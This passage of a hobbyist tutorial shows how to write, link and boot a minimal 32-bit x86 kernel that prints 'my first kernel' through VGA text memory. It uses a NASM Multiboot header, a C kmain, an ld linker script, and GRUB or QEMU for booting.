We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the end of the allocated memory, since the stack grows downward. We use the resb pseudo-instruction, which reserves memory given in bytes. After it, a label is left which points to the edge of the reserved piece of memory. Just before kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.


The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

/*
*  kernel.c
*/
void kmain(void)
{
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loops clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;
	}

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		/* next character of the string, next cell on screen */
		++j;
		i = i + 2;
	}
	return;
}

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory-mapped input/output for the screen starts at 0xb8000 and supports 25 lines, each containing 80 ASCII characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to.  The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color.

To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte.
0 represents black background and 2 represents green foreground.

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.


In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.
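The attribute byte and the position of a character cell can both be computed with a little arithmetic, sketched here in C. vga_attr() and vga_cell_offset() are hypothetical helpers that do not appear in the kernel source. One hedge: on many setups the top bit of the background nibble is interpreted as blink rather than as a bright background, so background values of 8 and above may not display as the colour table suggests.

```c
#include <assert.h>
#include <stdint.h>

#define VGA_COLUMNS 80
#define VGA_LINES   25

/* Hypothetical helper: background in the high nibble, foreground in the low. */
static uint8_t vga_attr(uint8_t fg, uint8_t bg)
{
	assert(fg < 16 && bg < 16);
	return (uint8_t)((bg << 4) | fg);
}

/* Hypothetical helper: byte offset of a cell from the start of video memory. */
static unsigned int vga_cell_offset(unsigned int line, unsigned int column)
{
	assert(line < VGA_LINES && column < VGA_COLUMNS);
	return (line * VGA_COLUMNS + column) * 2;	/* 2 bytes per cell */
}
```

Green on black is vga_attr(2, 0), i.e. 0x02, and light grey on black is vga_attr(7, 0), i.e. 0x07. The first cell of the second line starts 160 bytes after 0xb8000.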

In the first while loop, the program writes the blank character with 0x07 attribute all over the 80 columns of the 25 lines. This thus clears the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.


The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

/* link.ld */
OUTPUT_FORMAT(elf32-i386)
ENTRY(start)
SECTIONS
 {
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }
 }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that kernel’s code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have a look at the next line: .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter will become
0x100000 + the size of the text output section.

Similarly, the data and bss sections are merged and placed at the values the location counter holds at that point.


Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a boot loader, called the Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as Multiboot header) within its first 8 KiloBytes.

Further, this Multiboot header must contain 3 fields that are 4-byte aligned, namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero.
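The checksum rule is ordinary 32-bit wrap-around arithmetic, which the following C sketch spells out. multiboot_checksum() is a hypothetical helper written for this illustration, not something GRUB or the specification provides.

```c
#include <assert.h>
#include <stdint.h>

#define MULTIBOOT_MAGIC 0x1BADB002u

/* Hypothetical helper: the value that makes magic + flags + checksum */
/* wrap around to zero in 32-bit unsigned arithmetic.                 */
static uint32_t multiboot_checksum(uint32_t flags)
{
	uint32_t checksum = (uint32_t)(0u - (MULTIBOOT_MAGIC + flags));

	assert((uint32_t)(MULTIBOOT_MAGIC + flags + checksum) == 0);
	return checksum;
}
```

With flags set to zero, the checksum comes out as 0xE4524FFE.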

So our kernel.asm will become:


;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The dd defines a double word of size 4 bytes.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link them using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The ’-c ’ option makes sure that after compiling, linking doesn’t implicitly happen.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.


Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro


Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you’ll get a list selection with the name of your kernel listed.

Select it and you should see:


That’s your kernel!!



* It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking.
* To run this on grub2, which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro
}


* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel